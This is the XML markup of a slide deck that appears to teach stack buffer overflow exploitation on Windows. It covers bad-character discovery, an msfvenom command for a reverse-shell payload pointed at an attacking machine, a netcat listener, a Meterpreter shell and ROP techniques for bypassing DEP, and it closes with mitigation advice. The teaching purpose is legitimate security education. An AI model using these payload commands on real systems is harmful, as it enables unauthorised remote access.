                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Holding data waiting to be sent across a network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" u="sng" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>What Happens in a Buffer Overflow?</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Capacity Problem: A buffer has a set amount of space it can hold. A buffer overflow happens when you try to cram in more data than the buffer's capacity.</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Overflow: Like overfilling a glass of water, that extra data has to go somewhere. It spills over into adjacent memory areas meant for other things.</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Damage to Adjacent Memory: This overflow can corrupt existing data, or worse, overwrite important program control instructions, like:</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Return Addresses: These tell the program where to go back to after a function finishes executing.</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331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D93AA0-A603-1782-EDFD-BCDD07C210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6204" y="262046"/>
            <a:ext cx="10505614" cy="1494670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{751AAA91-3717-7C4C-E46F-80E0383006F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="12192001" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" i="0" u="sng" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" u="sng" dirty="0">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" i="0" u="sng" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" u="sng" dirty="0">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" i="0" u="sng" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" u="sng" dirty="0">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" i="0" u="sng" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Figuring out Bad Characters:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To identify bad characters, we control EIP and send a list of hex characters. By monitoring ESP in memory, we detect any </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>deviations or unique patterns. Common bad characters include null byte (\x00), line feed (\x0A), and carriage return (\x0D).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{796A3CE4-EACD-3E7A-CEE1-FF7F586456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6570" y="2857954"/>
            <a:ext cx="7346135" cy="2669042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343992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5C3C691-FE5A-429F-E3E7-8E74AFDA2E9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="7017306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Generating Shellcode and Gaining Access:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" u="sng" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Using our EIP return address, we generate shellcode with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>. Considering the list of bad characters, we ensure our shellcode avoids them. This shellcode will exploit the application, granting us access. We execute the shellcode to gain control and execute commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-code-pro"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-code-pro"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-code-pro"/>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-code-pro"/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-code-pro"/>
              </a:rPr>
              <a:t> LHOST=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-code-pro"/>
              </a:rPr>
              <a:t>attacking_machine_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-code-pro"/>
              </a:rPr>
              <a:t>&gt; LPORT=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-code-pro"/>
              </a:rPr>
              <a:t>attacking_machine_listening_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-code-pro"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-code-pro"/>
              </a:rPr>
              <a:t>EXITFUNC=thread -a x86 -b ‘\x00\x0A\x0D’ -f c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Time to send over our shellcode and gain access to the target. After making necessary changes to our script, we set up a listener and fire away the shellcode.</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nc</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lvnp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 1337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-code-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47FC843E-1314-A3F8-A457-8AD437BBEB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6078" y="1976205"/>
            <a:ext cx="6479809" cy="2011576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{680658C7-9B9B-EFBF-1D8D-B135715849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274" y="4989620"/>
            <a:ext cx="6479809" cy="1781629"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="956624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4E33236-FD28-2BC1-AB4A-B6C536294397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Defense &amp; Mitigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Implement secure coding practices when developing and building applications, by using secure programming functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Apply proper input validations and sanitizations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Implement memory protections like Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP), Structured Exception Handling (SEH).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3545290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1EC8F6-69E3-E5AC-2DAC-AACCB1016B7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="535531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Data Execution Prevention (DEP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Data Execution Prevention (DEP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> aims to prevent execution of code in certain memory regions. It renders stack-based execution attempts ineffective, causing exceptions. Despite its implementation, cybersecurity researchers have discovered methods to circumvent DEP. These techniques allow attackers to execute malicious code despite DEP protection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Pre-requisites:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>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242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Brief understanding of Buffer Overflow exploit development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Some knowledge of Assembly Language would also be helpful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Requirements:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>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242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Immunity Debugger with mona installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A system running Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A system running Kali</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vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Return-Oriented Programming (ROP) is commonly used to bypass Data Execution Prevention (DEP) and code signing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ROP involves chaining together machine instructions from existing assembly code, known as gadgets, which end with a return instruction (RET).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>These gadgets form ROP chains, allowing control of the stack to execute desired instructions. Developing ROP chains manually is time-consuming; alternatively, DEP can be disabled in runtime or non-protected memory space allocated for shellcode. Familiarity with Windows APIs is essential for leveraging ROP to bypass DEP effectively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3430996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A2A1AF-162A-D5D5-29D2-58701E5978CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="12192000" cy="701730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table below lists the APIs and their functionality that can be used to achieve this:</a:t>
            </a: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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A ROP chain can be developed to use any of the above functions given it is available for the Windows version of the victim machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>We have an example application that is vulnerable to stack overflow. The offset value for overwriting EIP is 2006. Let's see what happens when we exploit this application using Metasploit:</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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC8A5043-A64E-5228-5AB6-1A648E2C2DF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="461666"/>
            <a:ext cx="5563766" cy="3124579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E44BE26D-DBAF-3083-4A6F-963C70D12049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="4758211"/>
            <a:ext cx="10943936" cy="1803828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3548919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AB1003-618F-E0A4-86EA-A523BFECB63E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="590931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We can see that we got a Meterpreter shell with ease. Let's turn on DEP in Windows by navigating to the advanced system properties from the system properties, as follows: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0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
